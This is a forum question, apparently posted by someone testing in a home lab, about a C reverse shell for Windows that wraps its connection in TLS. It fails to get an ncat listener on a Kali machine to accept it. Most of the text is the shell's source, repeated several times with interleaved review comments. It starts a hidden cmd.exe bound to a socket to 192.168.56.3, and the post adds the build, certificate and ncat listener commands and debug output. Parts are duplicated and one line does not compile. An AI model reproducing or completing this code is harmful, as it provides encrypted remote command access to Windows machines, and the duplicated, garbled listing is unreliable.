I made a reverse shell for testing purposes and have encrypted it with SSL; the code is below:
x86_64-w64-mingw32-g++ ssl.c -o ssl.exe -I/opt/openssl/include/ -L/opt/openssl/lib64/ -lssl -lcrypto -lws2_32 -lcrypt32 -s -Os
static SSL_CTX* create_context(){
const SSL_METHOD *method;
method = TLS_client_method();
ctx = SSL_CTX_new(method);
printf("[!] Unable to create SSL contextn");
ERR_print_errors_fp(stderr);
static void configure_client_context(SSL_CTX *ctx){
SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL);
// loading self signed certificate
if (!SSL_CTX_load_verify_locations(ctx, "./cert.pem", NULL)) {
printf("[!] Unable to verify location of cert.pemn");
ERR_print_errors_fp(stderr);
ssl_ctx = create_context();
configure_client_context(ssl_ctx); // Added configuration for client context
char placetogo[32] = "192.168.56.3" ;
TCHAR cmd[160] = TEXT("cmd.exe");
WSAStartup(MAKEWORD(2, 2), &wsaData);
SOCKET newConn = WSASocketW( 2, 1, 6, NULL, (unsigned int)NULL, (unsigned int)NULL);
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;
struct sockaddr_in infsok;
infsok.sin_port = htons(prt) ;
host = gethostbyname(placetogo);
strcpy_s(placetogo, 16, inet_ntoa(*((struct in_addr *)host->h_addr)));
infsok.sin_addr.s_addr = inet_addr(placetogo);
memset(&ini_processo, 0, sizeof(ini_processo));
const sockaddr *name = (SOCKADDR*)&infsok;
ini_processo.cb = sizeof(ini_processo);
ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)newConn;
if(!SSL_set_fd(ssl, newConn)){
printf("[!] Unable to create client SSL structre...n");
ERR_print_errors_fp(stderr);
SSL_set_tlsext_host_name(ssl, placetogo); // set hostname
if(!SSL_set1_host(ssl, placetogo)){ // checking hostname
printf("[!] Hostname check failed...n");
ERR_print_errors_fp(stderr);
if (SSL_connect(ssl) == 1){
printf("[*] Successful SSL connection innitiatedn");
CreateProcessW(NULL, (LPWSTR)cmd, NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOW) &ini_processo, &processo_info);
printf("[!] SSL connection failed...n");
printf("[*] Last WSA error: %i", WSAGetLastError());
ERR_print_errors_fp(stderr);
<code>/*
x86_64-w64-mingw32-g++ ssl.c -o ssl.exe -I/opt/openssl/include/ -L/opt/openssl/lib64/ -lssl -lcrypto -lws2_32 -lcrypt32 -s -Os
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <ws2def.h>
// openssl headers
#include <openssl/ssl.h>
#include <openssl/err.h>
// SSL functions
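/**
 * Create a TLS client context.
 *
 * Builds an SSL_CTX from TLS_client_method(). On failure the OpenSSL error
 * queue is printed to stderr and the process exits with a non-zero status.
 *
 * @return A new SSL_CTX; the caller releases it with SSL_CTX_free().
 */
static SSL_CTX* create_context(){
    SSL_CTX *ctx = SSL_CTX_new(TLS_client_method());
    if(ctx == NULL){
        /* The message ends in "\n"; the listing had a bare 'n' where the
         * escape was lost. */
        printf("[!] Unable to create SSL context\n");
        ERR_print_errors_fp(stderr);
        /* A failed setup must not report success (status 0) to the caller. */
        exit(1);
    }
    return ctx;
}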
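/**
 * Configure peer verification on a TLS client context.
 *
 * Turns on SSL_VERIFY_PEER and loads "./cert.pem" as the set of trusted
 * certificates. On failure the OpenSSL error queue is printed to stderr and
 * the process exits with a non-zero status.
 *
 * @param ctx Context to configure.
 */
static void configure_client_context(SSL_CTX *ctx){
    SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL);
    /* The trust anchor is a self-signed certificate looked up relative to the
     * current working directory, so whoever can write to that directory
     * decides which peer this client accepts. */
    if (!SSL_CTX_load_verify_locations(ctx, "./cert.pem", NULL)) {
        /* "\n" restored; the listing had a bare 'n' at the end. */
        printf("[!] Unable to verify location of cert.pem\n");
        ERR_print_errors_fp(stderr);
        /* Exit non-zero: the trust store could not be loaded. */
        exit(1);
    }
}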
/*
 * Entry point. In order, it: builds a TLS client context, opens a TCP socket,
 * fills a STARTUPINFO whose three standard handles are that socket, attaches
 * the socket to an SSL object, runs the TLS handshake, and on success starts
 * cmd.exe with handle inheritance enabled.
 *
 * What an endpoint monitor can observe from this listing: a cmd.exe child
 * created with bInheritHandles = TRUE, STARTF_USESTDHANDLES set and its
 * standard handles pointing at a network socket, started by a parent that has
 * just opened an outbound connection to a hard-coded address and port.
 */
int main()
{
// SSL variables
SSL_CTX *ssl_ctx = NULL;
SSL *ssl;
ssl_ctx = create_context();
configure_client_context(ssl_ctx); // Added configuration for client context
// Hard-coded peer address and port.
char placetogo[32] = "192.168.56.3" ;
int prt = 5000;
// Command line later handed to CreateProcessW.
TCHAR cmd[160] = TEXT("cmd.exe");
WSADATA wsaData;
// Return value of WSAStartup is not checked.
WSAStartup(MAKEWORD(2, 2), &wsaData);
// 2, 1, 6 are the numeric values of AF_INET, SOCK_STREAM and IPPROTO_TCP.
// The result is not compared with INVALID_SOCKET.
SOCKET newConn = WSASocketW( 2, 1, 6, NULL, (unsigned int)NULL, (unsigned int)NULL);
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;
// infsok is filled field by field and never zeroed first.
struct sockaddr_in infsok;
infsok.sin_port = htons(prt) ;
// sz is not referenced again in this listing.
int sz = sizeof(infsok);
infsok.sin_family = 2;
struct hostent *host;
// placetogo2 is not referenced again in this listing.
char placetogo2[8] ;
// host is dereferenced on the next line without a NULL check.
host = gethostbyname(placetogo);
// Overwrites placetogo with the dotted-quad form of the first resolved
// address; the size passed is 16 although the buffer holds 32 bytes.
strcpy_s(placetogo, 16, inet_ntoa(*((struct in_addr *)host->h_addr)));
infsok.sin_addr.s_addr = inet_addr(placetogo);
memset(&ini_processo, 0, sizeof(ini_processo));
const sockaddr *name = (SOCKADDR*)&infsok;
ini_processo.cb = sizeof(ini_processo);
// STARTF_USESHOWWINDOW is set while wShowWindow keeps the 0 written by the
// memset above, which is the value of SW_HIDE.
ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
// stdin, stdout and stderr of the future child are all the socket handle.
ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)newConn;
// NOTE(review): x and w are not declared anywhere in this listing, so this
// line does not compile as shown. The return value is not checked either.
connect(x, name, w);
// create SSL structure
// The result of SSL_new is used below without a NULL check.
ssl = SSL_new(ssl_ctx);
// Attaches the same socket to the SSL object.
if(!SSL_set_fd(ssl, newConn)){
printf("[!] Unable to create client SSL structre...n");
ERR_print_errors_fp(stderr);
// Exits with status 0 although setup failed.
exit(0);
}
// Sends placetogo as the TLS server-name extension; return value unchecked.
SSL_set_tlsext_host_name(ssl, placetogo); // set hostname
// Records placetogo as the name the peer certificate must match; the match
// itself is evaluated during the handshake, not by this call.
if(!SSL_set1_host(ssl, placetogo)){ // checking hostname
printf("[!] Hostname check failed...n");
ERR_print_errors_fp(stderr);
exit(0);
}
if (SSL_connect(ssl) == 1){
printf("[*] Successful SSL connection innitiatedn");
// Fifth argument TRUE is bInheritHandles. The casts to LPWSTR and
// LPSTARTUPINFOW presumably assume a UNICODE build, where TCHAR is wchar_t
// and STARTUPINFO is STARTUPINFOW; TODO confirm. The return value is not
// checked and the handles in processo_info are never closed.
CreateProcessW(NULL, (LPWSTR)cmd, NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOW) &ini_processo, &processo_info);
}
else{
printf("[!] SSL connection failed...n");
printf("[*] Last WSA error: %i", WSAGetLastError());
ERR_print_errors_fp(stderr);
// Cleanup happens only on this failure path; the success path returns
// without freeing ssl or ssl_ctx.
if(ssl != NULL){
SSL_shutdown(ssl);
SSL_free(ssl);
}
SSL_CTX_free(ssl_ctx);
}
return 0;
}
</code>
/*
x86_64-w64-mingw32-g++ ssl.c -o ssl.exe -I/opt/openssl/include/ -L/opt/openssl/lib64/ -lssl -lcrypto -lws2_32 -lcrypt32 -s -Os
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <ws2def.h>
// openssl headers
#include <openssl/ssl.h>
#include <openssl/err.h>
// SSL functions
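/**
 * Create a TLS client context.
 *
 * Builds an SSL_CTX from TLS_client_method(). On failure the OpenSSL error
 * queue is printed to stderr and the process exits with a non-zero status.
 *
 * @return A new SSL_CTX; the caller releases it with SSL_CTX_free().
 */
static SSL_CTX* create_context(){
    SSL_CTX *ctx = SSL_CTX_new(TLS_client_method());
    if(ctx == NULL){
        /* The message ends in "\n"; the listing had a bare 'n' where the
         * escape was lost. */
        printf("[!] Unable to create SSL context\n");
        ERR_print_errors_fp(stderr);
        /* A failed setup must not report success (status 0) to the caller. */
        exit(1);
    }
    return ctx;
}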
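/**
 * Configure peer verification on a TLS client context.
 *
 * Turns on SSL_VERIFY_PEER and loads "./cert.pem" as the set of trusted
 * certificates. On failure the OpenSSL error queue is printed to stderr and
 * the process exits with a non-zero status.
 *
 * @param ctx Context to configure.
 */
static void configure_client_context(SSL_CTX *ctx){
    SSL_CTX_set_verify(ctx, SSL_VERIFY_PEER, NULL);
    /* The trust anchor is a self-signed certificate looked up relative to the
     * current working directory, so whoever can write to that directory
     * decides which peer this client accepts. */
    if (!SSL_CTX_load_verify_locations(ctx, "./cert.pem", NULL)) {
        /* "\n" restored; the listing had a bare 'n' at the end. */
        printf("[!] Unable to verify location of cert.pem\n");
        ERR_print_errors_fp(stderr);
        /* Exit non-zero: the trust store could not be loaded. */
        exit(1);
    }
}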
/*
 * Entry point. In order, it: builds a TLS client context, opens a TCP socket,
 * fills a STARTUPINFO whose three standard handles are that socket, attaches
 * the socket to an SSL object, runs the TLS handshake, and on success starts
 * cmd.exe with handle inheritance enabled.
 *
 * What an endpoint monitor can observe from this listing: a cmd.exe child
 * created with bInheritHandles = TRUE, STARTF_USESTDHANDLES set and its
 * standard handles pointing at a network socket, started by a parent that has
 * just opened an outbound connection to a hard-coded address and port.
 */
int main()
{
// SSL variables
SSL_CTX *ssl_ctx = NULL;
SSL *ssl;
ssl_ctx = create_context();
configure_client_context(ssl_ctx); // Added configuration for client context
// Hard-coded peer address and port.
char placetogo[32] = "192.168.56.3" ;
int prt = 5000;
// Command line later handed to CreateProcessW.
TCHAR cmd[160] = TEXT("cmd.exe");
WSADATA wsaData;
// Return value of WSAStartup is not checked.
WSAStartup(MAKEWORD(2, 2), &wsaData);
// 2, 1, 6 are the numeric values of AF_INET, SOCK_STREAM and IPPROTO_TCP.
// The result is not compared with INVALID_SOCKET.
SOCKET newConn = WSASocketW( 2, 1, 6, NULL, (unsigned int)NULL, (unsigned int)NULL);
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;
// infsok is filled field by field and never zeroed first.
struct sockaddr_in infsok;
infsok.sin_port = htons(prt) ;
// sz is not referenced again in this listing.
int sz = sizeof(infsok);
infsok.sin_family = 2;
struct hostent *host;
// placetogo2 is not referenced again in this listing.
char placetogo2[8] ;
// host is dereferenced on the next line without a NULL check.
host = gethostbyname(placetogo);
// Overwrites placetogo with the dotted-quad form of the first resolved
// address; the size passed is 16 although the buffer holds 32 bytes.
strcpy_s(placetogo, 16, inet_ntoa(*((struct in_addr *)host->h_addr)));
infsok.sin_addr.s_addr = inet_addr(placetogo);
memset(&ini_processo, 0, sizeof(ini_processo));
const sockaddr *name = (SOCKADDR*)&infsok;
ini_processo.cb = sizeof(ini_processo);
// STARTF_USESHOWWINDOW is set while wShowWindow keeps the 0 written by the
// memset above, which is the value of SW_HIDE.
ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
// stdin, stdout and stderr of the future child are all the socket handle.
ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)newConn;
// NOTE(review): x and w are not declared anywhere in this listing, so this
// line does not compile as shown. The return value is not checked either.
connect(x, name, w);
// create SSL structure
// The result of SSL_new is used below without a NULL check.
ssl = SSL_new(ssl_ctx);
// Attaches the same socket to the SSL object.
if(!SSL_set_fd(ssl, newConn)){
printf("[!] Unable to create client SSL structre...n");
ERR_print_errors_fp(stderr);
// Exits with status 0 although setup failed.
exit(0);
}
// Sends placetogo as the TLS server-name extension; return value unchecked.
SSL_set_tlsext_host_name(ssl, placetogo); // set hostname
// Records placetogo as the name the peer certificate must match; the match
// itself is evaluated during the handshake, not by this call.
if(!SSL_set1_host(ssl, placetogo)){ // checking hostname
printf("[!] Hostname check failed...n");
ERR_print_errors_fp(stderr);
exit(0);
}
if (SSL_connect(ssl) == 1){
printf("[*] Successful SSL connection innitiatedn");
// Fifth argument TRUE is bInheritHandles. The casts to LPWSTR and
// LPSTARTUPINFOW presumably assume a UNICODE build, where TCHAR is wchar_t
// and STARTUPINFO is STARTUPINFOW; TODO confirm. The return value is not
// checked and the handles in processo_info are never closed.
CreateProcessW(NULL, (LPWSTR)cmd, NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOW) &ini_processo, &processo_info);
}
else{
printf("[!] SSL connection failed...n");
printf("[*] Last WSA error: %i", WSAGetLastError());
ERR_print_errors_fp(stderr);
// Cleanup happens only on this failure path; the success path returns
// without freeing ssl or ssl_ctx.
if(ssl != NULL){
SSL_shutdown(ssl);
SSL_free(ssl);
}
SSL_CTX_free(ssl_ctx);
}
return 0;
}
The IP 192.168.56.3 is my Kali Linux machine, and cert.pem is generated as follows:
<code>openssl req -new -x509 -keyout key.pem -out cert.pem -days 365 -subj "/C=US/ST=State/L=City/O=Organization/OU=Unit/CN=localhost" -addext "subjectAltName=DNS:localhost,IP:192.168.56.3"
<code>openssl req -new -x509 -keyout key.pem -out cert.pem -days 365 -subj "/C=US/ST=State/L=City/O=Organization/OU=Unit/CN=localhost" -addext "subjectAltName=DNS:localhost,IP:192.168.56.3"
</code>
openssl req -new -x509 -keyout key.pem -out cert.pem -days 365 -subj "/C=US/ST=State/L=City/O=Organization/OU=Unit/CN=localhost" -addext "subjectAltName=DNS:localhost,IP:192.168.56.3"
The reverse shell is run in my Windows 11 VM. When I start my ncat listener on my Kali machine and then execute my shell, I get this SSL_read error, which I can’t find any specifics about:
<code>ncat -vnl 5000 --ssl --ssl-key key.pem --ssl-cert cert.pem -v -v -v
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
NCAT DEBUG: Initialized fdlist with 103 maxfds
Ncat: Listening on [::]:5000
NCAT DEBUG: Added fd 3 to list, nfds 1, maxfd 3
Ncat: Listening on 0.0.0.0:5000
NCAT DEBUG: Added fd 4 to list, nfds 2, maxfd 4
NCAT DEBUG: Added fd 0 to list, nfds 3, maxfd 4
NCAT DEBUG: Initialized fdlist with 100 maxfds
NCAT DEBUG: selecting, fdmax 4
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 4 is ready
NCAT DEBUG: Swapping fd[0] (3) with fd[2] (0)
NCAT DEBUG: Removed fd 3 from list, nfds 2, maxfd 4
NCAT DEBUG: Swapping fd[1] (4) with fd[1] (4)
NCAT DEBUG: Removed fd 4 from list, nfds 1, maxfd 0
Ncat: Connection from 192.168.56.9:49682.
NCAT DEBUG: Added fd 5 to list, nfds 2, maxfd 5
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: Added fd 5 to list, nfds 1, maxfd 5
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: SSL_read error on 5: error:00000001:lib(0)::reason(1)
NCAT DEBUG: Closing connection.
NCAT DEBUG: Swapping fd[1] (5) with fd[1] (5)
NCAT DEBUG: Removed fd 5 from list, nfds 1, maxfd 0
NCAT DEBUG: Swapping fd[0] (5) with fd[0] (5)
NCAT DEBUG: Removed fd 5 from list, nfds 0, maxfd 0
<code>ncat -vnl 5000 --ssl --ssl-key key.pem --ssl-cert cert.pem -v -v -v
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Enter PEM pass phrase:
NCAT DEBUG: Initialized fdlist with 103 maxfds
Ncat: Listening on [::]:5000
NCAT DEBUG: Added fd 3 to list, nfds 1, maxfd 3
Ncat: Listening on 0.0.0.0:5000
NCAT DEBUG: Added fd 4 to list, nfds 2, maxfd 4
NCAT DEBUG: Added fd 0 to list, nfds 3, maxfd 4
NCAT DEBUG: Initialized fdlist with 100 maxfds
NCAT DEBUG: selecting, fdmax 4
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 4 is ready
NCAT DEBUG: Swapping fd[0] (3) with fd[2] (0)
NCAT DEBUG: Removed fd 3 from list, nfds 2, maxfd 4
NCAT DEBUG: Swapping fd[1] (4) with fd[1] (4)
NCAT DEBUG: Removed fd 4 from list, nfds 1, maxfd 0
Ncat: Connection from 192.168.56.9:49682.
NCAT DEBUG: Added fd 5 to list, nfds 2, maxfd 5
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: Added fd 5 to list, nfds 1, maxfd 5
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: SSL_read error on 5: error:00000001:lib(0)::reason(1)
NCAT DEBUG: Closing connection.
NCAT DEBUG: Swapping fd[1] (5) with fd[1] (5)
NCAT DEBUG: Removed fd 5 from list, nfds 1, maxfd 0
NCAT DEBUG: Swapping fd[0] (5) with fd[0] (5)
NCAT DEBUG: Removed fd 5 from list, nfds 0, maxfd 0
</code>
ncat -vnl 5000 --ssl --ssl-key key.pem --ssl-cert cert.pem -v -v -v
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Enter PEM pass phrase:
NCAT DEBUG: Initialized fdlist with 103 maxfds
Ncat: Listening on [::]:5000
NCAT DEBUG: Added fd 3 to list, nfds 1, maxfd 3
Ncat: Listening on 0.0.0.0:5000
NCAT DEBUG: Added fd 4 to list, nfds 2, maxfd 4
NCAT DEBUG: Added fd 0 to list, nfds 3, maxfd 4
NCAT DEBUG: Initialized fdlist with 100 maxfds
NCAT DEBUG: selecting, fdmax 4
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 4 is ready
NCAT DEBUG: Swapping fd[0] (3) with fd[2] (0)
NCAT DEBUG: Removed fd 3 from list, nfds 2, maxfd 4
NCAT DEBUG: Swapping fd[1] (4) with fd[1] (4)
NCAT DEBUG: Removed fd 4 from list, nfds 1, maxfd 0
Ncat: Connection from 192.168.56.9:49682.
NCAT DEBUG: Added fd 5 to list, nfds 2, maxfd 5
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: Added fd 5 to list, nfds 1, maxfd 5
NCAT DEBUG: selecting, fdmax 5
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 5 is ready
NCAT DEBUG: SSL_read error on 5: error:00000001:lib(0)::reason(1)
NCAT DEBUG: Closing connection.
NCAT DEBUG: Swapping fd[1] (5) with fd[1] (5)
NCAT DEBUG: Removed fd 5 from list, nfds 1, maxfd 0
NCAT DEBUG: Swapping fd[0] (5) with fd[0] (5)
NCAT DEBUG: Removed fd 5 from list, nfds 0, maxfd 0
I’ve also tried socat, to no avail. Does anyone know what I can do to debug this more effectively? Or is it a certificate issue? I’ve also disabled Windows Firewall to make sure it wasn’t something there. I created a shared directory between my Kali machine and the VM, so both sides use the same certificate and are executed from the same place.